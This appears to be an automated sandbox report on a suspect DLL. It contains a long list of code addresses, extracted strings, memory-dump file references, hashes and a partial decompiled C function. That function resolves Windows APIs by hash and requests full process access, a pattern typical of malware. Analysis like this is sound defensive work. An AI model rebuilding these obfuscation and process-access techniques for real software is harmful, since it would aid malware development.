0x00000000
0x00000000
0x00000000
0x6e7a7720
0x6e7a7f23
0x6e7a7f23
0x6e7a7784
0x6e7a778d
0x6e7a7790
0x6e7a7793
0x6e7a7796
0x6e7a7798
0x6e7a77b6
0x6e7a77b9
0x6e7a77b9
0x6e7a77be
0x6e7a77c6
0x6e7a77c6
0x6e7a77c6
0x6e7a77c7
0x6e7a77d3
0x6e7a77d6
0x6e7a77d7
0x6e7a77db
0x6e7a77e0
0x6e7a77e4
0x6e7a77e6
0x6e7a77ed
0x6e7a77f5
0x6e7a77f9
0x6e7a77fd
0x6e7a7800
0x6e7a7803
0x6e7a7807
0x6e7a780f
0x6e7a780f
0x6e7a7812
0x6e7a7813
0x6e7a7815
0x6e7a7817
0x00000000
0x00000000
0x6e7a7819
0x6e7a781b
0x6e7a7ee2
0x6e7a7ee6
0x6e7a7ee9
0x6e7a7eed
0x00000000
0x00000000
0x00000000
0x6e7a7ef1
0x6e7a7ef1
0x6e7a7ef4
0x00000000
0x6e7a7efa
0x00000000
0x6e7a7efa
0x00000000
0x6e7a7821
0x6e7a7821
0x6e7a7823
0x6e7a7eff
0x6e7a7f03
0x6e7a7f06
0x6e7a7829
0x6e7a780d
0x6e7a780e
0x6e7a780e
0x00000000
0x6e7a780e
0x00000000
0x6e7a7823
0x6e7a779a
0x6e7a779a
0x6e7a779c
0x6e7a779f
0x6e7a7ecb
0x6e7a7ecb
0x6e7a7ece
0x6e7a7ed0
0x6e7a7ed2
0x6e7a7ed5
0x6e7a7ed7
0x00000000
0x6e7a7edd
0x00000000
0x6e7a7edd
0x6e7a77a5
0x6e7a77a5
0x6e7a7848
0x6e7a7848
0x6e7a7850
0x6e7a7855
0x6e7a785b
0x6e7a785b
0x6e7a785e
0x6e7a7862
0x6e7a7866
0x6e7a786a
0x6e7a786e
0x6e7a786e
0x6e7a7870
0x6e7a7870
0x6e7a7870
0x6e7a7870
0x6e7a7870
0x6e7a7874
0x6e7a787a
0x6e7a787d
0x6e7a7880
0x6e7a7886
0x6e7a7889
0x6e7a788f
0x6e7a7893
0x6e7a7895
0x6e7a78b5
0x6e7a78b9
0x6e7a78c8
0x6e7a78c8
0x6e7a78ce
0x6e7a78ce
0x6e7a78d3
0x6e7a78d7
0x6e7a78db
0x6e7a78dd
0x00000000
0x00000000
0x6e7a78e3
0x6e7a78e6
0x6e7a78e8
0x00000000
0x6e7a78ea
0x6e7a78ea
0x6e7a78f0
0x6e7a7904
0x6e7a7904
0x6e7a78f2
0x6e7a78f2
0x6e7a78f5
0x6e7a78f5
0x6e7a78f9
0x00000000
0x00000000
0x6e7a78fb
0x6e7a78fc
0x6e7a7902
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a7902
0x6e7a78f5
0x6e7a78f0
0x00000000
0x6e7a78e8
0x6e7a7f8f
0x6e7a7f92
0x6e7a7897
0x6e7a7897
0x6e7a789b
0x6e7a789b
0x6e7a789d
0x6e7a78a0
0x6e7a78a2
0x6e7a78a2
0x6e7a78a6
0x00000000
0x00000000
0x6e7a78ac
0x6e7a78ad
0x6e7a78af
0x00000000
0x6e7a78b1
0x6e7a78b1
0x00000000
0x6e7a78b1
0x00000000
0x6e7a78af
0x6e7a7f99
0x6e7a7f99
0x6e7a7909
0x6e7a7909
0x6e7a790b
0x6e7a7f88
0x6e7a7911
0x6e7a7913
0x6e7a7913
0x6e7a7916
0x6e7a792a
0x6e7a792e
0x6e7a793a
0x6e7a793a
0x6e7a7940
0x6e7a7940
0x6e7a7945
0x6e7a7949
0x6e7a794d
0x6e7a794f
0x00000000
0x00000000
0x6e7a7955
0x6e7a7958
0x6e7a795a
0x00000000
0x6e7a795c
0x6e7a795c
0x6e7a7962
0x6e7a7973
0x6e7a7973
0x00000000
0x6e7a7964
0x6e7a7964
0x6e7a7968
0x00000000
0x00000000
0x6e7a796a
0x6e7a796b
0x6e7a7971
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a7971
0x6e7a7964
0x6e7a7962
0x00000000
0x6e7a795a
0x6e7a7f7e
0x6e7a7f81
0x6e7a7918
0x6e7a791a
0x6e7a791c
0x6e7a791c
0x6e7a791f
0x6e7a791f
0x6e7a7923
0x00000000
0x00000000
0x6e7a7925
0x6e7a7926
0x6e7a7928
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a7928
0x6e7a791f
0x6e7a7916
0x6e7a7978
0x6e7a7978
0x6e7a7978
0x6e7a797c
0x6e7a797e
0x6e7a79a4
0x6e7a79a7
0x6e7a79aa
0x6e7a79ae
0x00000000
0x00000000
0x00000000
0x6e7a7980
0x6e7a7980
0x6e7a7982
0x6e7a7f2c
0x6e7a7f31
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a7988
0x6e7a7988
0x6e7a798b
0x6e7a798d
0x6e7a7992
0x6e7a7f37
0x6e7a7f37
0x6e7a79b4
0x6e7a79be
0x6e7a79c1
0x6e7a79c5
0x6e7a79c5
0x6e7a79cb
0x6e7a79d3
0x6e7a79d3
0x6e7a79d3
0x6e7a79d6
0x6e7a79dd
0x6e7a79e0
0x6e7a79e4
0x6e7a79e5
0x6e7a79ea
0x6e7a79ee
0x6e7a79f1
0x6e7a79f3
0x6e7a7a3a
0x6e7a79f5
0x6e7a79f5
0x6e7a79f9
0x6e7a79fb
0x6e7a79fd
0x6e7a7a00
0x6e7a7a02
0x6e7a7a04
0x6e7a7a06
0x6e7a7a0a
0x6e7a7a0a
0x6e7a7a0c
0x6e7a7a0e
0x6e7a7a0e
0x6e7a7a0f
0x6e7a7a14
0x6e7a7a18
0x6e7a7a1a
0x00000000
0x00000000
0x6e7a7a1c
0x6e7a7a20
0x6e7a7a23
0x6e7a7a25
0x00000000
0x00000000
0x00000000
0x6e7a7a25
0x6e7a7a27
0x6e7a7a27
0x6e7a7a04
0x6e7a7a2b
0x6e7a7a2d
0x6e7a7a2e
0x6e7a7a33
0x6e7a7a33
0x6e7a7a3d
0x6e7a7a40
0x6e7a7a40
0x6e7a7a42
0x6e7a7a44
0x6e7a7a46
0x00000000
0x6e7a7a46
0x6e7a7998
0x6e7a7998
0x6e7a7a49
0x6e7a7a49
0x6e7a7a4b
0x6e7a7a4d
0x6e7a7a4d
0x6e7a7a4f
0x6e7a7a4f
0x6e7a7a50
0x6e7a7a53
0x6e7a7a57
0x6e7a7a57
0x6e7a7a5a
0x00000000
0x00000000
0x6e7a7a5c
0x6e7a7a5e
0x6e7a7a61
0x00000000
0x00000000
0x00000000
0x6e7a7a61
0x6e7a7a4f
0x6e7a7a63
0x6e7a7a63
0x6e7a7a65
0x6e7a7a67
0x6e7a7a70
0x00000000
0x00000000
0x6e7a7a69
0x6e7a7a69
0x6e7a7a72
0x6e7a7a72
0x6e7a7a76
0x6e7a7a76
0x6e7a7a78
0x6e7a7a7c
0x6e7a7a7f
0x6e7a7a7f
0x6e7a7a83
0x6e7a7a86
0x6e7a7a88
0x00000000
0x00000000
0x6e7a7a8a
0x6e7a7a8a
0x6e7a7a8e
0x6e7a7a8f
0x6e7a7a91
0x00000000
0x00000000
0x00000000
0x6e7a7a91
0x6e7a7a93
0x6e7a7a97
0x6e7a7a97
0x6e7a7a9b
0x6e7a7a9b
0x6e7a7992
0x6e7a7982
0x6e7a797e
0x6e7a7889
0x6e7a7880
0x6e7a7a9e
0x6e7a7aa2
0x6e7a7aa8
0x6e7a7aaa
0x6e7a7aac
0x00000000
0x6e7a7aae
0x6e7a7aae
0x6e7a7ab1
0x6e7a7ac5
0x6e7a7ac7
0x00000000
0x6e7a7ac9
0x6e7a7acb
0x6e7a7acb
0x6e7a7ace
0x6e7a7ae2
0x6e7a7ae6
0x6e7a7af2
0x6e7a7af2
0x6e7a7af8
0x6e7a7af8
0x6e7a7afd
0x6e7a7b01
0x6e7a7b05
0x6e7a7b07
0x00000000
0x00000000
0x6e7a7b0d
0x6e7a7b10
0x6e7a7b12
0x00000000
0x6e7a7b14
0x6e7a7b14
0x6e7a7b1a
0x6e7a7b2b
0x6e7a7b2b
0x00000000
0x6e7a7b1c
0x6e7a7b1c
0x6e7a7b20
0x00000000
0x00000000
0x6e7a7b22
0x6e7a7b23
0x6e7a7b29
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a7b29
0x6e7a7b1c
0x6e7a7b1a
0x00000000
0x6e7a7b12
0x6e7a7f74
0x6e7a7f77
0x6e7a7ad0
0x6e7a7ad2
0x6e7a7ad4
0x6e7a7ad4
0x6e7a7ad7
0x6e7a7ad7
0x6e7a7adb
0x00000000
0x00000000
0x6e7a7add
0x6e7a7ade
0x6e7a7ae0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a7ae0
0x6e7a7ad7
0x6e7a7b30
0x6e7a7b30
0x6e7a7b32
0x6e7a7f6d
0x6e7a7b38
0x6e7a7b3a
0x6e7a7b3a
0x6e7a7b3d
0x6e7a7b51
0x6e7a7b55
0x6e7a7b61
0x6e7a7b65
0x6e7a7b65
0x6e7a7b6a
0x6e7a7b6a
0x6e7a7b6f
0x6e7a7b73
0x6e7a7b77
0x6e7a7b79
0x00000000
0x00000000
0x6e7a7b7f
0x6e7a7b82
0x6e7a7b84
0x00000000
0x6e7a7b86
0x6e7a7b86
0x6e7a7b8a
0x6e7a7b8f
0x6e7a7b9f
0x6e7a7b9f
0x00000000
0x6e7a7b91
0x6e7a7b91
0x6e7a7b95
0x00000000
0x00000000
0x6e7a7b97
0x6e7a7b98
0x6e7a7b9d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a7b9d
0x6e7a7b91
0x6e7a7b8f
0x00000000
0x6e7a7b84
0x6e7a7f5d
0x6e7a7f5f
0x6e7a7f62
0x6e7a7f66
0x6e7a7b3f
0x6e7a7b41
0x6e7a7b43
0x6e7a7b43
0x6e7a7b46
0x6e7a7b46
0x6e7a7b4a
0x00000000
0x00000000
0x6e7a7b4c
0x6e7a7b4d
0x6e7a7b4f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a7b4f
0x6e7a7b46
0x6e7a7b3d
0x6e7a7ba4
0x6e7a7ba4
0x6e7a7ba4
0x6e7a7ba8
0x6e7a7baa
0x6e7a7bd0
0x6e7a7bd3
0x6e7a7bd6
0x6e7a7bda
0x00000000
0x00000000
0x00000000
0x6e7a7bac
0x6e7a7bac
0x6e7a7bae
0x6e7a7fa2
0x6e7a7fa7
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a7bb4
0x6e7a7bb4
0x6e7a7bb7
0x6e7a7bb9
0x6e7a7bbe
0x6e7a7fa9
0x6e7a7fa9
0x6e7a7be0
0x6e7a7bea
0x6e7a7bed
0x6e7a7bf1
0x6e7a7bf1
0x6e7a7bf6
0x6e7a7bfe
0x6e7a7bfe
0x6e7a7bfe
0x6e7a7bff
0x6e7a7c0b
0x6e7a7c0e
0x6e7a7c12
0x6e7a7c13
0x6e7a7c17
0x6e7a7c1c
0x6e7a7c20
0x6e7a7c24
0x6e7a7c27
0x6e7a7c29
0x6e7a7c7f
0x6e7a7c2b
0x6e7a7c2b
0x6e7a7c30
0x6e7a7c32
0x6e7a7c34
0x6e7a7c37
0x6e7a7c39
0x6e7a7c3b
0x6e7a7c3d
0x6e7a7c41
0x6e7a7c41
0x6e7a7c43
0x6e7a7c47
0x6e7a7c47
0x6e7a7c48
0x6e7a7c4d
0x6e7a7c51
0x6e7a7c53
0x00000000
0x00000000
0x6e7a7c55
0x6e7a7c59
0x6e7a7c5c
0x6e7a7c5e
0x00000000
0x00000000
0x00000000
0x6e7a7c5e
0x6e7a7c60
0x6e7a7c64
0x6e7a7c64
0x6e7a7c3b
0x6e7a7c68
0x6e7a7c6a
0x6e7a7c6b
0x6e7a7c6f
0x6e7a7c74
0x6e7a7c78
0x6e7a7c78
0x6e7a7c82
0x6e7a7c86
0x6e7a7c86
0x6e7a7c88
0x6e7a7c8a
0x00000000
0x6e7a7c90
0x6e7a7c90
0x00000000
0x6e7a7c90
0x6e7a7bc4
0x6e7a7bc4
0x6e7a7c93
0x6e7a7c93
0x6e7a7c95
0x6e7a7c97
0x6e7a7c9b
0x6e7a7c9b
0x6e7a7c9d
0x6e7a7c9d
0x6e7a7c9e
0x6e7a7ca1
0x6e7a7ca5
0x6e7a7ca8
0x00000000
0x00000000
0x6e7a7caa
0x6e7a7cac
0x6e7a7caf
0x00000000
0x00000000
0x00000000
0x6e7a7caf
0x6e7a7cb1
0x6e7a7cb1
0x6e7a7cb5
0x6e7a7cb7
0x6e7a7cb9
0x6e7a7cc2
0x00000000
0x00000000
0x6e7a7cbb
0x6e7a7cbb
0x6e7a7cc4
0x6e7a7cc4
0x6e7a7ccc
0x6e7a7cd0
0x6e7a7cd4
0x6e7a7cd8
0x6e7a7cd8
0x6e7a7cdc
0x6e7a7cdf
0x6e7a7ce1
0x00000000
0x00000000
0x6e7a7ce3
0x6e7a7ce3
0x6e7a7ce7
0x6e7a7ce8
0x6e7a7cea
0x00000000
0x00000000
0x00000000
0x6e7a7cea
0x6e7a7cec
0x6e7a7cf0
0x6e7a7cf0
0x00000000
0x6e7a7cb9
0x6e7a7bbe
0x6e7a7bae
0x6e7a7baa
0x00000000
0x00000000
0x00000000
0x6e7a7ab1
0x00000000
0x6e7a7ab3
0x6e7a7ab7
0x6e7a7ab8
0x6e7a7ab8
0x00000000
0x6e7a7f41
0x6e7a7f45
0x6e7a7f46
0x6e7a7f46
0x6e7a7f4e
0x6e7a7f53
0x6e7a7f55
0x6e7a7e4b
0x6e7a7e4b
0x6e7a7e52
0x6e7a7e54
0x6e7a7e5a
0x6e7a7e5c
0x6e7a7e5e
0x6e7a7e95
0x6e7a7e60
0x6e7a7e60
0x6e7a7e62
0x6e7a7e64
0x6e7a7e67
0x6e7a7e69
0x6e7a7e6b
0x6e7a7e6d
0x6e7a7e6d
0x6e7a7e6f
0x6e7a7e6f
0x6e7a7e70
0x6e7a7e75
0x6e7a7e79
0x6e7a7e7b
0x00000000
0x00000000
0x6e7a7e7d
0x6e7a7e81
0x6e7a7e84
0x6e7a7e86
0x00000000
0x00000000
0x00000000
0x6e7a7e86
0x6e7a7e6f
0x6e7a7e6b
0x6e7a7e88
0x6e7a7e88
0x6e7a7e8a
0x6e7a7e8b
0x6e7a7e90
0x6e7a7e90
0x6e7a7e98
0x6e7a7e9b
0x6e7a7e9d
0x00000000
0x6e7a7cf4
0x6e7a7cf8
0x6e7a7cf9
0x6e7a7cfc
0x6e7a7cfc
0x6e7a7d04
0x6e7a7d04
0x6e7a7d07
0x6e7a7d07
0x6e7a7d09
0x6e7a7d0b
0x6e7a7d0e
0x6e7a7d0e
0x6e7a7d11
0x00000000
0x6e7a7d17
0x6e7a7d19
0x6e7a7d19
0x6e7a7d1c
0x6e7a7d30
0x6e7a7d34
0x6e7a7d40
0x6e7a7d40
0x6e7a7d46
0x6e7a7d46
0x6e7a7d4b
0x6e7a7d4f
0x6e7a7d53
0x6e7a7d55
0x00000000
0x00000000
0x6e7a7d5b
0x6e7a7d5e
0x6e7a7d60
0x00000000
0x6e7a7d62
0x6e7a7d62
0x6e7a7d68
0x6e7a7d79
0x6e7a7d79
0x00000000
0x6e7a7d6a
0x6e7a7d6a
0x6e7a7d6e
0x00000000
0x00000000
0x6e7a7d70
0x6e7a7d71
0x6e7a7d77
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a7d77
0x6e7a7d6a
0x6e7a7d68
0x00000000
0x6e7a7d60
0x6e7a7ec1
0x6e7a7ec4
0x6e7a7d1e
0x6e7a7d20
0x6e7a7d22
0x6e7a7d22
0x6e7a7d25
0x6e7a7d25
0x6e7a7d29
0x00000000
0x00000000
0x6e7a7d2b
0x6e7a7d2c
0x6e7a7d2e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a7d2e
0x6e7a7d25
0x6e7a7d7e
0x6e7a7d83
0x6e7a7d83
0x6e7a7d86
0x6e7a7d89
0x6e7a7d8c
0x6e7a7d8e
0x6e7a7da1
0x6e7a7da4
0x6e7a7da4
0x6e7a7daa
0x6e7a7db2
0x6e7a7db2
0x6e7a7db2
0x6e7a7db5
0x6e7a7dbc
0x6e7a7dbf
0x6e7a7dc5
0x6e7a7dc7
0x6e7a7dcd
0x6e7a7dcf
0x6e7a7dd1
0x6e7a7e20
0x6e7a7dd3
0x6e7a7dd3
0x6e7a7dd5
0x6e7a7dd7
0x6e7a7dda
0x6e7a7ddc
0x6e7a7dde
0x6e7a7de0
0x6e7a7de2
0x6e7a7de5
0x6e7a7de9
0x6e7a7deb
0x6e7a7deb
0x6e7a7dec
0x6e7a7df1
0x6e7a7df5
0x6e7a7df7
0x00000000
0x00000000
0x6e7a7df9
0x6e7a7dfd
0x6e7a7e00
0x6e7a7e02
0x00000000
0x00000000
0x00000000
0x6e7a7e02
0x6e7a7e04
0x6e7a7e07
0x6e7a7e07
0x6e7a7dde
0x6e7a7e0b
0x6e7a7e0d
0x6e7a7e0e
0x6e7a7e12
0x6e7a7e17
0x6e7a7e1b
0x6e7a7e1b
0x6e7a7e23
0x6e7a7e26
0x6e7a7e29
0x6e7a7d90
0x6e7a7d90
0x6e7a7d90
0x6e7a7e2b
0x6e7a7e2d
0x6e7a7e2f
0x6e7a7e31
0x6e7a7e37
0x6e7a7e37
0x6e7a7e3a
0x6e7a7e3b
0x6e7a7e3d
0x6e7a7e3f
0x00000000
0x00000000
0x6e7a7e41
0x6e7a7e43
0x6e7a7ebb
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a7e45
0x6e7a7e45
0x6e7a7e47
0x6e7a7e35
0x6e7a7e36
0x6e7a7e36
0x00000000
0x6e7a7e36
0x00000000
0x6e7a7e47
0x6e7a7e37
0x6e7a7e2f
0x6e7a7d11
0x6e7a779f
0x6e7a7798
0x6e7a76f5
0x6e7a7ea4
0x6e7a7ea4
0x6e7a7ea6
0x6e7a7ea7
0x6e7a7eb8
0x6e7a7674
0x6e7a7674
0x6e7a7679
0x6e7a767b
0x6e7a767d
0x6e7a7685
0x6e7a7687
0x6e7a768d
0x6e7a7691
0x6e7a76c8
0x6e7a7693
0x6e7a7695
0x6e7a7697
0x6e7a769a
0x6e7a769e
0x6e7a76a0
0x6e7a76a2
0x6e7a76a2
0x6e7a76a3
0x6e7a76a8
0x6e7a76ae
0x00000000
0x00000000
0x6e7a76b0
0x6e7a76b4
0x6e7a76b9
0x00000000
0x00000000
0x00000000
0x6e7a76b9
0x6e7a76a2
0x6e7a769e
0x6e7a76bb
0x6e7a76bb
0x6e7a76bd
0x6e7a76be
0x6e7a76c3
0x6e7a76c3
0x6e7a76cb
0x6e7a76ce
0x6e7a76d5
0x6e7a76e0
0x6e7a76e0
0x00000000

Strings

w8{n, xrefs: 6E7A7886, 6E7A78C5, 6E7A7A7C, 6E7A78F2, 6E7A787A, 6E7A789D
@, xrefs: 6E7A7FA2
w8{n, xrefs: 6E7A7848

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: @$w8{n$w8{n
API String ID: 0-1796361773
Opcode ID: 52cf54630ff8bdc2b50b66d371acd1fbb21b2ea9802d435e193b7f6b95655d85
Instruction ID: 2a0f50769537557cb97c551a0abe8fb583ea1050df1d070c5c6a898eb6cc4ec9
Opcode Fuzzy Hash: 52cf54630ff8bdc2b50b66d371acd1fbb21b2ea9802d435e193b7f6b95655d85
Instruction Fuzzy Hash: E7521871A083534BE7158EBCC69031A77D6AF86310F14877DEAA59B3E9DB34C941CB82

Uniqueness

Uniqueness Score: -1.00%

Function 6E781570, Relevance: 3.6, Strings: 2, Instructions: 1143
COMMONCrypto

Download Yara Rule

C-Code - Quality: 41%

			E6E781570(signed int __ecx, void* __edx, void* __eflags) {
				char _v44;
				intOrPtr _v48;
				char _v56;
				char _v72;
				char _v80;
				void* _v116;
				char _v124;
				char _v128;
				signed int _v136;
				char _v140;
				char _v144;
				void* _v148;
				char _v152;
				signed int _v156;
				signed int _v160;
				intOrPtr _v164;
				signed int _v168;
				char _v172;
				char _v176;
				void* _v184;
				void* _v188;
				void* _v192;
				char _v196;
				void* _v212;
				char _v216;
				void* _v220;
				char _v224;
				char _v228;
				char _v236;
				char _v240;
				char _v244;
				char _v248;
				void* _v252;
				intOrPtr _v276;
				char _v280;
				char _v288;
				void* _v292;
				char _v296;
				void* _v300;
				intOrPtr _v308;
				signed int _v328;
				void* _v348;
				void* _v352;
				char _v356;
				char _v368;
				char _v372;
				void* _v380;
				char _v384;
				char _v388;
				char _v392;
				char _v396;
				char _v400;
				char _v408;
				char _v412;
				char _v416;
				char _v420;
				char _v428;
				char _v432;
				char _v436;
				char _v444;
				char _v448;
				char _v452;
				char _v456;
				char _v460;
				char _v464;
				char _v468;
				char _v472;
				char _v476;
				char _v480;
				char _v484;
				char _v488;
				char _v492;
				char _v496;
				char _v500;
				char _v504;
				char _v508;
				char _v512;
				char _v516;
				char _v520;
				char _v524;
				char _v528;
				char _v532;
				char _v536;
				char _v540;
				char _v544;
				char _v548;
				char _v552;
				char _v556;
				char _v560;
				char _v564;
				char _v568;
				char _v572;
				char _v576;
				char _v580;
				char _v584;
				char _v588;
				void* _v592;
				void* _v596;
				void* _v600;
				void* _v604;
				intOrPtr _v608;
				void* _v612;
				void* _v616;
				void* _v620;
				void* _v624;
				void* _v628;
				void* _v632;
				void* _v636;
				void* _v640;
				void* _v644;
				void* _v648;
				void* _v668;
				void* _v1676;
				void* _v1684;
				void* _v1692;
				void* _v1708;
				intOrPtr _v1800;
				intOrPtr _v1804;
				intOrPtr _v1808;
				intOrPtr _v1812;
				intOrPtr _v1816;
				void* _v1820;
				void* _v1824;
				void* _v1828;
				void* _v1832;
				void* _v1836;
				void* _v1840;
				void* _v1844;
				void* _v1848;
				void* _v1852;
				void* _v1856;
				void* _v1860;
				void* _v1864;
				void* _v1868;
				void* _v1872;
				void* _v1876;
				void* _v1956;
				void* _v1960;
				void* _v2760;
				void* _v2764;
				void* _v2768;
				void* _v2772;
				void* _v2776;
				intOrPtr _v2820;
				signed int _v2860;
				void* _v2864;
				intOrPtr _v2868;
				intOrPtr _v2872;
				intOrPtr _v2876;
				void* _v2880;
				intOrPtr _v2884;
				void* _v2888;
				void* _v2896;
				void* _v2904;
				intOrPtr _v2908;
				void* _v2912;
				intOrPtr _v2916;
				void* _v2920;
				void* _v2928;
				void* _v2936;
				void* _v2940;
				void* _v2944;
				void* _v2948;
				void* _v2952;
				void* _v2956;
				char _v2960;
				void* _v2964;
				void* _v2968;
				void* _v2976;
				void* _v2984;
				signed int _v2988;
				signed int _v2992;
				void* _v3000;
				void* _v3020;
				void* _v3048;
				void* _v3052;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t313;
				signed int _t317;
				void* _t322;
				signed int _t325;
				signed int _t329;
				void* _t345;
				intOrPtr _t368;
				signed int _t370;
				signed int _t379;
				signed int _t383;
				signed int _t387;
				signed int _t562;
				signed int _t571;
				signed int _t585;
				signed int _t586;
				signed int _t595;
				signed int _t599;
				signed int _t620;
				signed int _t621;
				signed int _t782;
				void* _t800;
				signed int _t803;
				void* _t812;
				signed int _t817;
				signed int _t820;
				signed int _t831;
				void* _t833;
				void* _t834;
				void* _t835;
				void* _t838;

				_t827 = _t831;
				_push(_t800);
				_t833 = (_t831 & 0xffffffe0) - 0xad4;
				_t595 = __ecx;
				_t812 = __edx;
				E6E7AB6B0( &_v44,  *((intOrPtr*)(__ecx + 0x1c)));
				_push(0);
				E6E7B1C80(__ecx,  &_v72, _t800, __edx, _t831, _v48);
				E6E7A0B10( &_v56);
				if(E6E7B1F90(_t595,  &_v80, _t831, 0) != 0) {
					_push(0);
					E6E7A9350( &_v168);
					_push(0);
					E6E7A9350( &_v156);
					_push(0);
					E6E7A9350( &_v144);
					__eflags = _t595;
					_t11 = _t595 + 0xc; // 0xc
					_t612 =  ==  ? _t595 : _t11;
					_t313 = E6E7ABEA0( ==  ? _t595 : _t11, 0x1d, _t812);
					__eflags = _t313;
					if(_t313 != 0) {
						_push(0x1fffff);
						E6E7AEA50(_t595);
					}
					__eflags = _t595;
					_t12 = _t595 + 0xc; // 0xc
					_t802 =  ==  ? _t595 : _t12;
					_push(0);
					_push(0);
					_t803 =  *( ==  ? _t595 : _t12);
					E6E7B2060(_t595,  &_v228, _t803, _t812);
					 *(_t833 + 0xa78) = 0;
					asm("pxor xmm0, xmm0");
					_v128 = 1;
					asm("movq [esp+0xa90], xmm0");
					 *((intOrPtr*)(_t833 + 0xa90)) = E6E7A9650(_t812);
					_t317 = E6E7915C0(0x588ab3ea, 0xa65417fb);
					__eflags = _t317;
					if(_t317 == 0) {
						 *(_t833 + 0x40) = 0;
						E6E7ABDC0(_t833 + 0xa7c,  *((intOrPtr*)(_t833 + 0xa8c)));
						__eflags =  *(_t833 + 0x40);
						if( *(_t833 + 0x40) == 0) {
							_v124 = 0;
							_v136 = 0;
							_v140 = 0;
							 *((intOrPtr*)(_t833 + 0xa84)) = 0;
							_t782 = E6E7915C0(0x588ab3ea, 0x9cac62c7);
							__eflags = _t782;
							if(_t782 != 0) {
								 *(_t833 + 0x40) =  *(_t833 + 0xa78);
								 *(_t833 + 0x44) = _t782;
								_t322 = E6E7A9650(_t812);
								_t783 =  *(_t833 + 0x44);
								 *(_t833 + 0x50) = _t803;
								_t803 =  *(_t833 + 0x78);
								_t325 =  *( *(_t833 + 0x44))( *((intOrPtr*)(_t833 + 0x64)), 0xffffffff, _t833 + 0xaa0, 0, _t322,  &_v140,  &_v124, 2, 0, 4);
								__eflags = _t325;
								if(_t325 == 0) {
									goto L11;
								} else {
									__eflags = _v168;
									if(_v168 != 0) {
										goto L53;
									}
									goto L54;
								}
							} else {
								L11:
								 *(_t833 + 0x40) = E6E7A9640(_t812, 0);
								E6E790C10(_v164,  *(_t833 + 0x44), E6E7A9650(_t812));
								_t833 = _t833 + 0xc;
								_t329 = E6E7915C0(0x588ab3ea, 0xa8f2638d);
								__eflags = _t329;
								if(_t329 == 0) {
									 *(_t833 + 0x4bc) = 0;
									_t620 = E6E7915C0(0x588ab3ea, 0xea812079);
									__eflags = _t620;
									if(_t620 == 0) {
										L17:
										_v140 =  *(_t833 + 0x4bc);
										_t621 = E6E7915C0(0x588ab3ea, 0xea812079);
										__eflags = _t621;
										if(_t621 == 0) {
											L26:
											_v136 =  *(_t833 + 0x4bc);
											__eflags = _v168;
											if(_v168 != 0) {
												E6E7ABE30( &_v172, _t812);
											}
											__eflags = E6E7AED90(_t595) - 0x20;
											_push(0);
											_t336 =  ==  ? 0x6e7b8600 : 0x6e7b8c40;
											_push( ==  ? 0x6e7b8600 : 0x6e7b8c40);
											E6E791BA0(E6E7AED90(_t595) - 0x20, _t833 + 0xac0);
											E6E7A9B10( &_v240);
											E6E7A0B10( &_v124);
											E6E7A9670( &_v228, E6E7A9A90( &_v244, _t812));
											 *(_t833 + 0x40) = E6E7A9640( &_v248, 0);
											E6E78AC20(_t827,  *(_t833 + 0x44), E6E7A9640( &_v236, 0),  *((intOrPtr*)(_t833 + 0xab8)));
											_t834 = _t833 + 8;
											_t345 = E6E7AED90(_t595);
											__eflags = _t345 - 0x20;
											if(_t345 == 0x20) {
												E6E790B70(_t834 + 0x40, 0, 0x47c);
												_t835 = _t834 + 0xc;
												 *((intOrPtr*)(_t835 + 0x44c)) = E6E7A9650(_t812);
												 *((intOrPtr*)(_t835 + 0x444)) = 0x56473829;
												 *((intOrPtr*)(_t835 + 0x46c)) = E6E7915C0(0x588ab3ea, 0x9cac62c7);
												 *((intOrPtr*)(_t835 + 0x470)) = E6E7915C0(0x588ab3ea, 0xa8f2638d);
												 *((intOrPtr*)(_t835 + 0x474)) = E6E7915C0(0x588ab3ea, 0xd8cc7390);
												 *((intOrPtr*)(_t835 + 0x478)) = E6E7915C0(0x588ab3ea, 0xd16c9225);
												 *((intOrPtr*)(_t835 + 0x47c)) = E6E7915C0(0x588ab3ea, 0x649746ec);
												 *((intOrPtr*)(_t835 + 0x480)) = E6E7915C0(0x588ab3ea, 0xe5ef1afa);
												 *((intOrPtr*)(_t835 + 0x484)) = E6E7915C0(0x588ab3ea, 0x58d59bc9);
												 *((intOrPtr*)(_t835 + 0x488)) = E6E7915C0(0x588ab3ea, 0x35b39b2b);
												 *((intOrPtr*)(_t835 + 0x48c)) = E6E7915C0(0x588ab3ea, 0xe9fbf3a8);
												 *((intOrPtr*)(_t835 + 0x490)) = E6E7915C0(0x588ab3ea, 0xbcd9ca71);
												 *((intOrPtr*)(_t835 + 0x494)) = E6E7915C0(0x588ab3ea, 0x4faea65b);
												 *((intOrPtr*)(_t835 + 0x498)) = E6E7915C0(0x588ab3ea, 0xc0b67de0);
												 *((intOrPtr*)(_t835 + 0x49c)) = E6E7915C0(0x588ab3ea, 0x996e050f);
												 *((intOrPtr*)(_t835 + 0x4a0)) = E6E7915C0(0x588ab3ea, 0x81c9e4a7);
												 *((intOrPtr*)(_t835 + 0x4a4)) = E6E7915C0(0x588ab3ea, 0x97abe05f);
												_v1800 = E6E7915C0(0x588ab3ea, 0x82d274c4);
												_v1804 = E6E7915C0(0xa1310f65, 0x77be1f6);
												_v1808 = E6E7915C0(0xa1310f65, 0xe2d27ff4);
												_v1812 = E6E7915C0(0xa1310f65, 0x69121530);
